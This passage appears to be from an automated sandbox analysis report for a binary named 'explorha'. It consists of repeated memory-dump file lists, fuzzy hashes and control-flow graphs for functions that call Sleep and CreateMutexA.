                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: db4176f3204a77be2559d31bc828a002fd0e730a6eb38d9742347635c41142c4
                                                                                                      • Instruction ID: 01c6d9869ea5550198e2146e00c28425eaf6e3b9474a08a86a1f784434fa0b7d
                                                                                                      • Opcode Fuzzy Hash: db4176f3204a77be2559d31bc828a002fd0e730a6eb38d9742347635c41142c4
                                                                                                      • Instruction Fuzzy Hash: 30310971600504DBEB0CDB7CCD89B6DB676FB86318F248258E415EB3D6CB7599808B63
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086A152 Relevance: 3.1, APIs: 2, Instructions: 122sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 196 86a152-86a172 200 86a174-86a180 196->200 201 86a1a0-86a1bc 196->201 202 86a196-86a19d call 87ecf8 200->202 203 86a182-86a190 200->203 204 86a1be-86a1ca 201->204 205 86a1ea-86a209 201->205 202->201 203->202 208 86a419-86a466 call 8982fa * 2 Sleep CreateMutexA 203->208 210 86a1e0-86a1e7 call 87ecf8 204->210 211 86a1cc-86a1da 204->211 206 86a237-86a3e6 call 879750 205->206 207 86a20b-86a217 205->207 213 86a22d-86a234 call 87ecf8 207->213 214 86a219-86a227 207->214 210->205 211->208 211->210 213->206 214->208 214->213
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 8f70be8890443f49367fe77e1891d993366fa382edec50ac23f33d564c161d0d
                                                                                                      • Instruction ID: 68946bc699608aa654eaa5a0dd8f72fd10c08b266bfe7685d98cd4f062ded32a
                                                                                                      • Opcode Fuzzy Hash: 8f70be8890443f49367fe77e1891d993366fa382edec50ac23f33d564c161d0d
                                                                                                      • Instruction Fuzzy Hash: C43128716001049BEF0CDB7CDD89B6DB776FB86314F248218E425EB3D6C77699808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086958C Relevance: 3.1, APIs: 2, Instructions: 106sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 229 86958c-8695aa 230 8695ac-8695b8 229->230 231 8695d8-8695f7 229->231 232 8695ce-8695d5 call 87ecf8 230->232 233 8695ba-8695c8 230->233 234 869625-86a3e6 call 879750 231->234 235 8695f9-869605 231->235 232->231 233->232 236 86a3e7 233->236 238 869607-869615 235->238 239 86961b-869622 call 87ecf8 235->239 244 86a423-86a466 Sleep CreateMutexA 236->244 245 86a3e7 call 8982fa 236->245 238->236 238->239 239->234 245->244
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 952b1fcdf55653180af387fe0ba5e204b3f531f3a043e1a6333f4cf42aa37e60
                                                                                                      • Instruction ID: 43827bb565a5eb0b29a0892e20266fb0bfe68a91751048b5eecb38c874bd9a47
                                                                                                      • Opcode Fuzzy Hash: 952b1fcdf55653180af387fe0ba5e204b3f531f3a043e1a6333f4cf42aa37e60
                                                                                                      • Instruction Fuzzy Hash: FC2168316042089BFB08DF6CDD897ACBB76FB85314F20820DE459EB3C5C7759A808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086A326 Relevance: 3.1, APIs: 2, Instructions: 91sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 271 86a326-86a33e 272 86a340-86a34c 271->272 273 86a36c-86a36e 271->273 274 86a362-86a369 call 87ecf8 272->274 275 86a34e-86a35c 272->275 276 86a370-86a377 273->276 277 86a379-86a381 call 8678b0 273->277 274->273 275->274 278 86a41e-86a458 call 8982fa Sleep CreateMutexA 275->278 280 86a3bb-86a3e6 call 879750 276->280 288 86a3b4-86a3b6 277->288 289 86a383-86a38b call 8678b0 277->289 292 86a45e-86a466 278->292 288->280 289->288 293 86a38d-86a395 call 8678b0 289->293 293->288 297 86a397-86a39f call 8678b0 293->297 297->288 300 86a3a1-86a3a9 call 8678b0 297->300 300->288 303 86a3ab-86a3b2 300->303 303->280
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: a23582f2f80350953b448829066b11e2e799452dcb6197a3d30aaf92f0ade2f1
                                                                                                      • Instruction ID: 5d29c5223efbc329d7aec1008673967b840aa52c83b7fe90abd52a50a076924b
                                                                                                      • Opcode Fuzzy Hash: a23582f2f80350953b448829066b11e2e799452dcb6197a3d30aaf92f0ade2f1
                                                                                                      • Instruction Fuzzy Hash: 51213D3134420997FB2CAB6CDE8FB6C7663FB41704F254415E504EA7C2CA799D80CAAB
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869E1F Relevance: 3.1, APIs: 2, Instructions: 91sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 251 869e1f-869e2b 252 869e41-869e6a call 87ecf8 251->252 253 869e2d-869e3b 251->253 259 869e6c-869e78 252->259 260 869e98-86a3e6 call 879750 252->260 253->252 255 86a40a 253->255 257 86a423-86a466 Sleep CreateMutexA 255->257 258 86a40a call 8982fa 255->258 258->257 261 869e8e-869e95 call 87ecf8 259->261 262 869e7a-869e88 259->262 261->260 262->255 262->261
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
